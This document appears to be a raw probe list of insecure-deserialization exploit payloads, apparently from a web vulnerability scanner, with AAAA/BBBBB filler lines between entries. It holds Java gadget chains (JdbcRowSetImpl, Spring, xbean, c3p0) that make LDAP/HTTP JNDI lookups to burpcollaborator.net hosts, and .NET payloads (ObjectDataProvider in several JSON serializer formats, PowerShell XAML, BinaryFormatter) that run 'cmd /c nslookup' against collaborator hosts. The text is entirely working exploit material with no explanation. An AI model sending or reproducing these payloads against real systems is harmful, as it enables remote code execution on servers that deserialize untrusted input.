ur[Ljava.lang.Object;��X�s)lxp srjava.lang.Integer⠤���8Ivaluexrjava.lang.Number������xp����q~ q~ q~ q~ q~ q~ q~ q~ q~ xppppsq~ uq~ tfoopppppppppxq~x
AAAA
BBBBB
AAAA
BBBBB
AAAA
rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAnamF2YS51dGlsLkNvbGxlY3Rpb25zJFJldmVyc2VDb21wYXJhdG9yZASK8FNOStACAAB4cHQAEGRhdGFiYXNlTWV0YURhdGF3BAAAAANzcgAdY29tLnN1bi5yb3dzZXQuSmRiY1Jvd1NldEltcGzOJtgfSXPCBQIAB0wABGNvbm50ABVMamF2YS9zcWwvQ29ubmVjdGlvbjtMAA1pTWF0Y2hDb2x1bW5zdAASTGphdmEvdXRpbC9WZWN0b3I7TAACcHN0ABxMamF2YS9zcWwvUHJlcGFyZWRTdGF0ZW1lbnQ7TAAFcmVzTUR0ABxMamF2YS9zcWwvUmVzdWx0U2V0TWV0YURhdGE7TAAGcm93c01EdAAlTGphdmF4L3NxbC9yb3dzZXQvUm93U2V0TWV0YURhdGFJbXBsO0wAAnJzdAAUTGphdmEvc3FsL1Jlc3VsdFNldDtMAA9zdHJNYXRjaENvbHVtbnNxAH4AC3hyABtqYXZheC5zcWwucm93c2V0LkJhc2VSb3dTZXRD0R2lTcKx4AIAFUkAC2NvbmN1cnJlbmN5WgAQZXNjYXBlUHJvY2Vzc2luZ0kACGZldGNoRGlySQAJZmV0Y2hTaXplSQAJaXNvbGF0aW9uSQAMbWF4RmllbGRTaXplSQAHbWF4Um93c0kADHF1ZXJ5VGltZW91dFoACHJlYWRPbmx5SQAKcm93U2V0VHlwZVoAC3Nob3dEZWxldGVkTAADVVJMcQB+AARMAAthc2NpaVN0cmVhbXQAFUxqYXZhL2lvL0lucHV0U3RyZWFtO0wADGJpbmFyeVN0cmVhbXEAfgARTAAKY2hhclN0cmVhbXQAEExqYXZhL2lvL1JlYWRlcjtMAAdjb21tYW5kcQB+AARMAApkYXRhU291cmNlcQB+AARMAAlsaXN0ZW5lcnNxAH4AC0wAA21hcHQAD0xqYXZhL3V0aWwvTWFwO0wABnBhcmFtc3QAFUxqYXZhL3V0aWwvSGFzaHRhYmxlO0wADXVuaWNvZGVTdHJlYW1xAH4AEXhwAAAD8AEAAAPoAAAAAAAAAAIAAAAAAAAAAAAAAAABAAAD7ABwcHBwcHQAyGxkYXA6Ly94dXYyOGk2cTllMXRnM3c0azdrbnpqeDk5MGZyM2cuYnVycGNvbGxhYm9yYXRvci5uZXQvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcHBzcgATamF2YS51dGlsLkhhc2h0YWJsZRO7DyUhSuS4AwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAh3CAAAAAsAAAAAeHBwc3IAEGphdmEudXRpbC5WZWN0b3LZl31bgDuvAQMAA0kAEWNhcGFjaXR5SW5jcmVtZW50SQAMZWxlbWVudENvdW50WwALZWxlbWVudERhdGF0ABNbTGphdmEvbGFuZy9PYmplY3Q7eHAAAAAAAAAACnVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAApzcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhw/////3EAfgAgcQB+ACBxAH4AIHEAfgAgcQB+ACBxAH4AIHEAfgAgcQB+ACBxAH4AIHhwcHBwc3EAfgAZAAAAAAAAAAp1cQB+ABwAAAAKdAADZm9vcHBwcHBwcHBweHEAfgAVeA==
AAAA
BBBBB
m69fr%3ca%3exerab
BBBBB
AAAA
��srjava.util.HashMap���`�F loadFactorI thresholdxp?@wsr7org.springframework.aop.target.HotSwappableTargetSourceh ��A�SLtargettLjava/lang/Object;xpsr;org.apache.xbean.naming.context.ContextUtil$ReadOnlyBindingEg{Ь*vZ isRelativeLcontexttLjavax/naming/Context;Lvalueq~xrjavax.naming.Bindingz�5˵�/LboundObjq~xrjavax.naming.NameClassPairN��vhkZisRelL classNametLjava/lang/String;LfullNameq~ Lnameq~ xppptfoosrjavax.naming.Reference�ƞ��� LaddrstLjava/util/Vector;L classFactoryq~ LclassFactoryLocationq~ L classNameq~ xpsrjava.util.Vectorٗ}[�;�IcapacityIncrementI elementCount[elementDatat[Ljava/lang/Object;xpur[Ljava.lang.Object;��X�s)lxp ppppppppppxtFreddyt�http://jxkob49cc04fjpzqntn9250vcmie63.burpcollaborator.net/ q~sr/org.apache.xbean.naming.context.WritableContextY��Qu4ZassumeDereferenceBoundZcacheReferencesZcheckDereferenceDifferentZsupportReferenceableLbindingsReft-Ljava/util/concurrent/atomic/AtomicReference;LindexRefq~L writeLockt!Ljava/util/concurrent/locks/Lock;xr8org.apache.xbean.naming.context.AbstractFederatedContext��՛,ySDLcontextFederationt3Lorg/apache/xbean/naming/context/ContextFederation;L masterContextt:Lorg/apache/xbean/naming/context/AbstractFederatedContext;xr/org.apache.xbean.naming.context.AbstractContextY�fw*rLkZ modifiableL contextAccesst/Lorg/apache/xbean/naming/context/ContextAccess;LinCalltLjava/lang/ThreadLocal;LnameInNamespaceq~ LparsedNameInNamespacetLjavax/naming/Name;xppppppppppq~q~sq~sr1com.sun.org.apache.xpath.internal.objects.XString ';H��xr1com.sun.org.apache.xpath.internal.objects.XObject�� �{�Lm_objq~xr,com.sun.org.apache.xpath.internal.Expression٦����Lm_parentt2Lcom/sun/org/apache/xpath/internal/ExpressionNode;xpptq~!x
AAAA
BBBBB
AAAA
BBBBB
AAAA
rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAAAIAAAACc3IAN29yZy5zcHJpbmdmcmFtZXdvcmsuYW9wLnRhcmdldC5Ib3RTd2FwcGFibGVUYXJnZXRTb3VyY2VoDf7kp0GjUwIAAUwABnRhcmdldHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwc3IAO29yZy5hcGFjaGUueGJlYW4ubmFtaW5nLmNvbnRleHQuQ29udGV4dFV0aWwkUmVhZE9ubHlCaW5kaW5nRWd70KwaKnYCAANaAAppc1JlbGF0aXZlTAAHY29udGV4dHQAFkxqYXZheC9uYW1pbmcvQ29udGV4dDtMAAV2YWx1ZXEAfgADeHIAFGphdmF4Lm5hbWluZy5CaW5kaW5neqs1y7XxLwICAAFMAAhib3VuZE9ianEAfgADeHIAGmphdmF4Lm5hbWluZy5OYW1lQ2xhc3NQYWlyTgECi/p2aGsCAARaAAVpc1JlbEwACWNsYXNzTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wACGZ1bGxOYW1lcQB+AAlMAARuYW1lcQB+AAl4cAFwcHQAA2Zvb3NyABZqYXZheC5uYW1pbmcuUmVmZXJlbmNl6MaeoqjpjQkCAARMAAVhZGRyc3QAEkxqYXZhL3V0aWwvVmVjdG9yO0wADGNsYXNzRmFjdG9yeXEAfgAJTAAUY2xhc3NGYWN0b3J5TG9jYXRpb25xAH4ACUwACWNsYXNzTmFtZXEAfgAJeHBzcgAQamF2YS51dGlsLlZlY3RvctmXfVuAO68BAwADSQARY2FwYWNpdHlJbmNyZW1lbnRJAAxlbGVtZW50Q291bnRbAAtlbGVtZW50RGF0YXQAE1tMamF2YS9sYW5nL09iamVjdDt4cAAAAAAAAAAAdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAACnBwcHBwcHBwcHB4dAAGRnJlZGR5dADIaHR0cDovL2tienBwNW5kcTFpZ3hxZHIxdTFhZzZld3Fud2drNS5idXJwY29sbGFib3JhdG9yLm5ldC8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxAH4ACwBzcgAvb3JnLmFwYWNoZS54YmVhbi5uYW1pbmcuY29udGV4dC5Xcml0YWJsZUNvbnRleHRZ8R26UXU0BQIAB1oAFmFzc3VtZURlcmVmZXJlbmNlQm91bmRaAA9jYWNoZVJlZmVyZW5jZXNaABljaGVja0RlcmVmZXJlbmNlRGlmZmVyZW50WgAUc3VwcG9ydFJlZmVyZW5jZWFibGVMAAtiaW5kaW5nc1JlZnQALUxqYXZhL3V0aWwvY29uY3VycmVudC9hdG9taWMvQXRvbWljUmVmZXJlbmNlO0wACGluZGV4UmVmcQB+ABdMAAl3cml0ZUxvY2t0ACFMamF2YS91dGlsL2NvbmN1cnJlbnQvbG9ja3MvTG9jazt4cgA4b3JnLmFwYWNoZS54YmVhbi5uYW1pbmcuY29udGV4dC5BYnN0cmFjdEZlZGVyYXRlZENvbnRleHTd6dWbLHlTRAIAAkwAEWNvbnRleHRGZWRlcmF0aW9udAAzTG9yZy9hcGFjaGUveGJlYW4vbmFtaW5nL2NvbnRleHQvQ29udGV4dEZlZGVyYXRpb247TAANbWFzdGVyQ29udGV4dHQAOkxvcmcvYXBhY2hlL3hiZWFuL25hbWluZy9jb250ZXh0L0Fic3RyYWN0RmVkZXJhdGVkQ29udGV4dDt4cgAvb3JnLmFwYWNoZS54YmVhbi5uYW1pbmcuY29udGV4dC5BYnN0cmFjdENvbnRleHRZ9GZ3KnJMawIABVoACm1vZGlmaWFibGVMAA1jb250ZXh0QWNjZXNzdAAvTG9yZy9hcGFjaGUveGJlYW4vbmFtaW5nL2NvbnRleHQvQ29udGV4dEFjY2VzcztMAAZpbkNhbGx0ABdMamF2YS9sYW5nL1RocmVhZExvY2FsO0wAD25hbWVJbk5hbWVzcGFjZXEAfgAJTAAVcGFyc2VkTmFtZUluTmFtZXNwYWNldAATTGphdmF4L25hbWluZy9OYW1lO3hwAHBwcHBwcAAAAABwcHBxAH4ADnEAfgAEc3EAfgACc3IAMWNvbS5zdW4ub3JnLmFwYWNoZS54cGF0aC5pbnRlcm5hbC5vYmplY3RzLlhTdHJpbmccCic7SBbF/QIAAHhyADFjb20uc3VuLm9yZy5hcGFjaGUueHBhdGguaW50ZXJuYWwub2JqZWN0cy5YT2JqZWN09JgSCbt7thkCAAFMAAVtX29ianEAfgADeHIALGNvbS5zdW4ub3JnLmFwYWNoZS54cGF0aC5pbnRlcm5hbC5FeHByZXNzaW9uB9mmHI2srNYCAAFMAAhtX3BhcmVudHQAMkxjb20vc3VuL29yZy9hcGFjaGUveHBhdGgvaW50ZXJuYWwvRXhwcmVzc2lvbk5vZGU7eHBwdAAG4au8AQQDcQB+ACF4
m69frxerab
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
DQ==
AAAA
BBBBB
fu61aqs8i6><
BBBBB
AAAA
3com.mchange.v2.c3p0.WrapperConnectionPoolDataSourceuserOverridesAsString�HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400064672656464797400c8687474703a2f2f6169776877626e377334633232756e7330386a687a63366d756430336f732e62757270636f6c6c61626f7261746f722e6e65742f202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020740003466f6f;
AAAA
BBBBB
AAAA
BBBBB
AAAA
EAAzY29tLm1jaGFuZ2UudjIuYzNwMC5XcmFwcGVyQ29ubmVjdGlvblBvb2xEYXRhU291cmNlABV1c2VyT3ZlcnJpZGVzQXNTdHJpbmcCBc9IZXhBc2NpaVNlcmlhbGl6ZWRNYXA6YWNlZDAwMDU3MzcyMDAzZDYzNmY2ZDJlNmQ2MzY4NjE2ZTY3NjUyZTc2MzIyZTZlNjE2ZDY5NmU2NzJlNTI2NTY2NjU3MjY1NmU2MzY1NDk2ZTY0Njk3MjY1NjM3NDZmNzIyNDUyNjU2NjY1NzI2NTZlNjM2NTUzNjU3MjY5NjE2YzY5N2E2NTY0NjIxOTg1ZDBkMTJhYzIxMzAyMDAwNDRjMDAwYjYzNmY2ZTc0NjU3ODc0NGU2MTZkNjU3NDAwMTM0YzZhNjE3NjYxNzgyZjZlNjE2ZDY5NmU2NzJmNGU2MTZkNjUzYjRjMDAwMzY1NmU3Njc0MDAxNTRjNmE2MTc2NjEyZjc1NzQ2OTZjMmY0ODYxNzM2ODc0NjE2MjZjNjUzYjRjMDAwNDZlNjE2ZDY1NzEwMDdlMDAwMTRjMDAwOTcyNjU2NjY1NzI2NTZlNjM2NTc0MDAxODRjNmE2MTc2NjE3ODJmNmU2MTZkNjk2ZTY3MmY1MjY1NjY2NTcyNjU2ZTYzNjUzYjc4NzA3MDcwNzA3MzcyMDAxNjZhNjE3NjYxNzgyZTZlNjE2ZDY5NmU2NzJlNTI2NTY2NjU3MjY1NmU2MzY1ZThjNjllYTJhOGU5OGQwOTAyMDAwNDRjMDAwNTYxNjQ2NDcyNzM3NDAwMTI0YzZhNjE3NjYxMmY3NTc0Njk2YzJmNTY2NTYzNzQ2ZjcyM2I0YzAwMGM2MzZjNjE3MzczNDY2MTYzNzQ2ZjcyNzk3NDAwMTI0YzZhNjE3NjYxMmY2YzYxNmU2NzJmNTM3NDcyNjk2ZTY3M2I0YzAwMTQ2MzZjNjE3MzczNDY2MTYzNzQ2ZjcyNzk0YzZmNjM2MTc0Njk2ZjZlNzEwMDdlMDAwNzRjMDAwOTYzNmM2MTczNzM0ZTYxNmQ2NTcxMDA3ZTAwMDc3ODcwNzM3MjAwMTA2YTYxNzY2MTJlNzU3NDY5NmMyZTU2NjU2Mzc0NmY3MmQ5OTc3ZDViODAzYmFmMDEwMzAwMDM0OTAwMTE2MzYxNzA2MTYzNjk3NDc5NDk2ZTYzNzI2NTZkNjU2ZTc0NDkwMDBjNjU2YzY1NmQ2NTZlNzQ0MzZmNzU2ZTc0NWIwMDBiNjU2YzY1NmQ2NTZlNzQ0NDYxNzQ2MTc0MDAxMzViNGM2YTYxNzY2MTJmNmM2MTZlNjcyZjRmNjI2YTY1NjM3NDNiNzg3MDAwMDAwMDAwMDAwMDAwMDA3NTcyMDAxMzViNGM2YTYxNzY2MTJlNmM2MTZlNjcyZTRmNjI2YTY1NjM3NDNiOTBjZTU4OWYxMDczMjk2YzAyMDAwMDc4NzAwMDAwMDAwYTcwNzA3MDcwNzA3MDcwNzA3MDcwNzg3NDAwMDY0NjcyNjU2NDY0Nzk3NDAwYzg2ODc0NzQ3MDNhMmYyZjM4MzEzNzY2NjYzOTM2MzU2MjMyNzYzMDZjNzMzNjcxNmEzNjMyNjY2OTYxNzA2YjY0NjI2YTMyMzc3MjJlNjI3NTcyNzA2MzZmNmM2YzYxNjI2ZjcyNjE3NDZmNzIyZTZlNjU3NDJmMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwNzQwMDAzNDY2ZjZmOwAACQ==
AAAA
BBBBB
fu61aqs8i6%3e%3c
BBBBB
AAAA
com.sun.rowset.JdbcRowSetImpldataSourceName�ldap://hwhoai1e6bq9g11zefxodjkt8kec21.burpcollaborator.net/ autoCommit0123456789101112131415
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA"
BBBBB
AAAA
nslookupntkrntj8wmhwlptgri12jvlcx33tri.burpcollaborator.net
AAAA
BBBBB
AAAA
2databaseMetaData31008true100002000true1004falseldap://v62k8zv21djyb1g9n84wkberzi58tx.burpcollaborator.net/-1-1-1-1-1-1-1-1-1-1foo
AAAA'
BBBBB
AAAA
/wH/
AAAA
0false0nslookupmpfbrqetk42pusz06znn32xii9o0cp.burpcollaborator.netfalsejava.lang.ProcessBuilderstartfoofoofalse00falsefalse0
AAAA
BBBBB
AAAA
��
AAAA
0false0footrueFooFreddyhttp://rytg0vnyt9bu3x85f4wsc76nrex6lv.burpcollaborator.net/false10falsefalse0truefalse00falsefalse0
AAAA
BBBBB
AAAA
2<_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0" xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic" xmlns:a="http://schemas.datacontract.org/2004/07/System">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089CompareSystem.StringSystem.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]StartSystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089System.Diagnostics.ProcessSystem.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]System.Diagnostics.Process Start(System.String, System.String)System.Diagnostics.Process Start(System.String, System.String)8Int32 Compare(System.String, System.String)System.Int32 Compare(System.String, System.String)82/c nslookup f1h7ya9fz3qzjhujn7nkm36im9s0gp.burpcollaborator.netcmd
AAAA
BBBBB
AAAA
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Management.Infrastructure.CimInstance#System.Management.Automation/RunspaceInvoke5</T>
<T>Microsoft.Management.Infrastructure.CimInstance#RunspaceInvoke5</T>
<T>Microsoft.Management.Infrastructure.CimInstance</T>
<T>System.Object</T>
</TN>
<ToString>RunspaceInvoke5</ToString>
<Obj RefId="1">
<TNRef RefId="0" />
<ToString>RunspaceInvoke5</ToString>
<Props>
<Nil N="PSComputerName" />
<Obj N="test1" RefId ="20" > 
<TN RefId="1" > 
<T>System.Windows.Markup.XamlReader[], PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35</T>
<T>System.Array</T>
<T>System.Object</T>
</TN>
<LST>
<S N="Hash" ><ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system"><ObjectDataProvider x:Key="LaunchCalc" ObjectType = "{ x:Type Diag:Process}" MethodName = "Start" ><ObjectDataProvider.MethodParameters><System:String>cmd</System:String><System:String>/c "nslookup y76q4tfy5mwip002tqt3smc1ssyim7.burpcollaborator.net" </System:String></ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary></S>
</LST>
</Obj>
</Props>
<MS>
<Obj N="__ClassMetadata" RefId ="2"> 
<TN RefId="1" > 
<T>System.Collections.ArrayList</T>
<T>System.Object</T>
</TN>
<LST>
<Obj RefId="3"> 
<MS>
<S N="ClassName">RunspaceInvoke5</S>
<S N="Namespace">System.Management.Automation</S>
<Nil N="ServerName" />
<I32 N="Hash">460929192</I32>
<S N="MiXml"> <CLASS NAME="RunspaceInvoke5" ><PROPERTY NAME="test1" TYPE ="string" ></PROPERTY></CLASS></S>
</MS>
</Obj>
</LST>
</Obj>
</MS>
</Obj>
<MS>
<Ref N="__ClassMetadata" RefId ="2" />
</MS>
</Obj>
</Objs>
AAAA
BBBBB
AAAA
{'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35','MethodName':'Start','MethodParameters':{'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089','$values':['cmd.exe','/c nslookup 3qulq10d9gmr1o9fho1dzjc8zz5pte.burpcollaborator.net']},'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}}
AAAA
{"$type":""}
AAAA
BBBBB
AAAA
{'__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35','MethodName':'Start','ObjectInstance':{'__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089','StartInfo': {'__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089','FileName':'cmd.exe','Arguments':'/c nslookup o8x2uuh3fthc0htp4tl0t3mdw42uqj.burpcollaborator.net'}}}
AAAA
{"__type":""}
AAAA
BBBBB
AAAA
{"$types":{"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35":"1","System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089":"2", "System.Diagnostics.ProcessStartInfo, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089":"3"},"$type":"1","ObjectInstance":{"$type":"2","StartInfo":{"$type":"3","FileName":"cmd.exe","Arguments":"/c nslookup shd35xpqmb728p2sojrld6eg379xxm.burpcollaborator.net"}},"MethodName":"Start"}
AAAA
{"$types":{"":""}}
AAAA
BBBBB
AAAA
{"FsPickler":"4.0.0","type":""}
AAAA
BBBBB
AAAA
AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAMsBL2MgbnNsb29rdXAgZzdvNG10Ymxsdnp1MHQxbGczZXZ5NWk0eHYzb3JkLmJ1cnBjb2xsYWJvcmF0b3IubmV0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1N